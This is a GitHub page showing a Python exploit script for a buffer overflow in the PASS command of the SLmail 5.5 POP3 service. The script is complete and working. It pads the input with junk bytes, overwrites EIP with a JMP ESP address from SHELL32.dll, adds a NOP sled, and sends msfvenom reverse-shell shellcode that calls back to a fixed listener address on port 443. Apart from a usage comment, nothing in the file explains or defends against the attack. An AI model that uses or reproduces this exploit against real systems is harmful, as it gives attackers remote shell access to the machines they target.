-
Notifications
You must be signed in to change notification settings - Fork 1
/
SLmail5.5POP3-'PASS'BufferOverflow.py
40 lines (40 loc) · 2.08 KB
/
SLmail5.5POP3-'PASS'BufferOverflow.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
#!/usr/bin/env python
import socket,sys
#How To Use: python exploit.py [target] [port] or ./exploit.py [target] [port]
junk = '\x41' * 2606
eip = '\x69\x2D\xB3\x7C' #JMP ESP SHELL32.dll 7CB32D69
nop = '\x90' * 26
#Shellcode: "msfvenom -p windows/shell_reverse_tcp LHOST=192.168.225.128 LPORT=443 -b '\x0a\x0d\x00' -f c"
shellcode = ("\xd9\xcb\xbb\x44\x18\xdd\x0f\xd9\x74\x24\xf4\x5a\x33\xc9\xb1"
"\x52\x31\x5a\x17\x83\xea\xfc\x03\x1e\x0b\x3f\xfa\x62\xc3\x3d"
"\x05\x9a\x14\x22\x8f\x7f\x25\x62\xeb\xf4\x16\x52\x7f\x58\x9b"
"\x19\x2d\x48\x28\x6f\xfa\x7f\x99\xda\xdc\x4e\x1a\x76\x1c\xd1"
"\x98\x85\x71\x31\xa0\x45\x84\x30\xe5\xb8\x65\x60\xbe\xb7\xd8"
"\x94\xcb\x82\xe0\x1f\x87\x03\x61\xfc\x50\x25\x40\x53\xea\x7c"
"\x42\x52\x3f\xf5\xcb\x4c\x5c\x30\x85\xe7\x96\xce\x14\x21\xe7"
"\x2f\xba\x0c\xc7\xdd\xc2\x49\xe0\x3d\xb1\xa3\x12\xc3\xc2\x70"
"\x68\x1f\x46\x62\xca\xd4\xf0\x4e\xea\x39\x66\x05\xe0\xf6\xec"
"\x41\xe5\x09\x20\xfa\x11\x81\xc7\x2c\x90\xd1\xe3\xe8\xf8\x82"
"\x8a\xa9\xa4\x65\xb2\xa9\x06\xd9\x16\xa2\xab\x0e\x2b\xe9\xa3"
"\xe3\x06\x11\x34\x6c\x10\x62\x06\x33\x8a\xec\x2a\xbc\x14\xeb"
"\x4d\x97\xe1\x63\xb0\x18\x12\xaa\x77\x4c\x42\xc4\x5e\xed\x09"
"\x14\x5e\x38\x9d\x44\xf0\x93\x5e\x34\xb0\x43\x37\x5e\x3f\xbb"
"\x27\x61\x95\xd4\xc2\x98\x7e\x1b\xba\x43\xfe\xf3\xb9\x83\xfe"
"\xb8\x37\x65\x6a\xaf\x11\x3e\x03\x56\x38\xb4\xb2\x97\x96\xb1"
"\xf5\x1c\x15\x46\xbb\xd4\x50\x54\x2c\x15\x2f\x06\xfb\x2a\x85"
"\x2e\x67\xb8\x42\xae\xee\xa1\xdc\xf9\xa7\x14\x15\x6f\x5a\x0e"
"\x8f\x8d\xa7\xd6\xe8\x15\x7c\x2b\xf6\x94\xf1\x17\xdc\x86\xcf"
"\x98\x58\xf2\x9f\xce\x36\xac\x59\xb9\xf8\x06\x30\x16\x53\xce"
"\xc5\x54\x64\x88\xc9\xb0\x12\x74\x7b\x6d\x63\x8b\xb4\xf9\x63"
"\xf4\xa8\x99\x8c\x2f\x69\xa9\xc6\x6d\xd8\x22\x8f\xe4\x58\x2f"
"\x30\xd3\x9f\x56\xb3\xd1\x5f\xad\xab\x90\x5a\xe9\x6b\x49\x17"
"\x62\x1e\x6d\x84\x83\x0b")
exploit = junk + eip + nop + shellcode + nop
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((sys.argv[1],int(sys.argv[2])))
s.recv(1024)
s.send('USER Hacker'+'\r\n')
s.recv(1024)
s.send('PASS ' + exploit + '\r\n')
s.close()
print("\nExploit Completed :)\n")